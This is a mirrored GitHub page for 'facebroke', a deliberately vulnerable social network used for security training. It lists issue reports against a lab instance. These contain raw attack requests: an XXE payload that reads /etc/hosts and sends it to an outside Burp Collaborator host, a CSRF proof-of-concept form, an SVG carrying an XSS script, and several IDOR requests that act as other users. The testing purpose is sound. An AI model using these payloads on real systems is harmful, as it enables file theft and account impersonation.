softwaresecured / facebroke Goto Github PK
View Code? Open in Web Editor NEWA deliberately vulnerable social network
License: GNU General Public License v3.0
facebroke's People
Stargazers
Watchers
Forkers
aglav016 jarusk superqifanwinallthetime cannotparse mkotyk xinwei12 qcorporation skoussa livharriss qcorporation-testing ser10yus skoussa2 skoussa3 reshift-projects quan-kreeping sstesting-account bsprottrs reshift-test1 scalable-analysis softsectest information-flow-experimentsfacebroke's Issues
Insecure File Upload
Steps to reproduce:
- Login as any user
- Upload a new profile picture
- Upload any file type
I was able to upload docx, svg, xml, html, jsp etc
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------264311999222285
Content-Length: 827
Referer: https://192.168.99.100:8443/settings?id=1002
Cookie: JSESSIONID=D997F0ADEA6C0E4E5445D957349C22F0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------264311999222285
Content-Disposition: form-data; name="creator_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="owner_id"
1002
-----------------------------264311999222285
Content-Disposition: form-data; name="label"
Profile Picture
-----------------------------264311999222285
Content-Disposition: form-data; name="context"
profile
-----------------------------264311999222285
Content-Disposition: form-data; name="file"; filename="evil-xxe.docx"
Content-Type: application/vnd.openxmlformats-officedocument.wordprocessingml.document
<!ENTITY % data SYSTEM "file:///etc/hosts"><!ENTITY % param1 "<!ENTITY exfil SYSTEM 'yy08gndcee5xrh6ws928gj4qlhr7fw.burpcollaborator.net?%data;'>">
-----------------------------264311999222285--
Attack response:
HTTP/1.1 302
Location: settings?id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 15:49:25 GMT
Connection: close
CSRF on submitting a new Post
The application is vulnerable to CSRF attacks on all POST requests.
Steps to reproduce:
- Login as any user
- Create a new post on the main page
- Capture the request using an intercepting proxy
- Launch the proof of concept using the proxy (in this case BurpSuite) by right clicking on the request we want to try and navigating to engagement tools->generate csrf poc
- Click test in browser
PoC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://192.168.99.100:8443/wall?user_id=1002" method="POST">
<input type="hidden" name="on_wall" value="1" />
<input type="hidden" name="creator_id" value="682" />
<input type="hidden" name="type" value="TEXT" />
<input type="hidden" name="content" value="CSRFed not myself" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Attack Request:
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: http://burp/
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=682&type=TEXT&content=CSRFed+not+myself
Attack Response:
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:14:34 GMT
Connection: close
All the POST requests look vulnerable to a similar attack as there are no CSRF tokens being used
IDOR on posting on wall / news feed
Steps to Reproduce:
- Log in as any user
- Navigate to your wall
- Make a post on your own wall
- Capture the request using an intercepting proxy
- Resend the request after modifying the creator_id to any other user
- View your wall to see a post from the other user
Note: creator_id=682 is the Adam Perez user and user_id=1002 is myself
Attack Request
POST /wall?user_id=1002 HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Referer: https://192.168.99.100:8443/index
Cookie: JSESSIONID=5FE72AC60AACB875AD93B6F63C87A69A
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=682&type=TEXT&content=not myself
Attack Response
HTTP/1.1 302
Location: wall?user_id=1002
Content-Length: 0
Date: Thu, 26 Oct 2017 17:10:57 GMT
Connection: close
IDOR on settings page
Steps to reproduce:
- Login as a normal user
- Update your settings
- Capture the request using an intercepting proxy
- Resend the request after updating the id and target_id and name field to another user
- Navigate to the other users wall and see that their name has been changed
Attack Request:
POST /settings?id=486 HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: application/x-www-form-urlencoded
Content-Length: 154
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
regLastName=Test®Password=®DOB=1995-09-01&[email protected]®Username=otest®FirstName=Olivia&target_id=486®PasswordConfirm=
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 14:01:09 GMT
Connection: close
IDOR on profile pic upload
Steps to reproduce:
- Login as a normal user
- Update your profile picture with any picture
- Capture the request using an intercepting proxy
- Resend the request after changing the creator_id and owner_id to that of another user
- Navigate to the other users wall and view the upload image
Attack Request:
POST /image HTTP/1.1
Host: 192.168.99.100:8443
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.99.100:8443/settings?id=1002
Content-Type: multipart/form-data; boundary=--------207487880
Content-Length: 884
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
----------207487880
Content-Disposition: form-data; name="file"; filename="image.svg"
Content-Type: image/svg+xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('This app is probably vulnerable to XSS attacks!');
</script>
</svg>
----------207487880
Content-Disposition: form-data; name="owner_id"
486
----------207487880
Content-Disposition: form-data; name="creator_id"
486
----------207487880
Content-Disposition: form-data; name="context"
profile
----------207487880
Content-Disposition: form-data; name="label"
Test Picture
----------207487880--
Attack Response:
HTTP/1.1 302
Location: settings?id=486
Content-Length: 0
Date: Thu, 26 Oct 2017 13:49:46 GMT
Connection: close
IDOR on comment
Steps to reproduce:
- register and login as normal user
- Post a comment
- Intercepted the request and changed the creator id to another user
- Resent the request as the other user
Here are the request and responses showing posting a comment as another user. For reference my user has an id of 1002
Attack Request
POST /comment HTTP/1.1
Host: 192.168.99.100:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
Referer: https://192.168.99.100:8443/wall?user_id=1002
Cookie: JSESSIONID=CB39DD1389BDE85C38D86EDE670B1363
Connection: close
Upgrade-Insecure-Requests: 1
on_wall=1&creator_id=486&post_id=2892&content=Sandra Comment
Attack Response
HTTP/1.1 302
Location: wall?user_id=1002#2892
Content-Length: 0
Date: Thu, 26 Oct 2017 13:45:32 GMT
Connection: close
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. ๐๐๐
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google โค๏ธ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.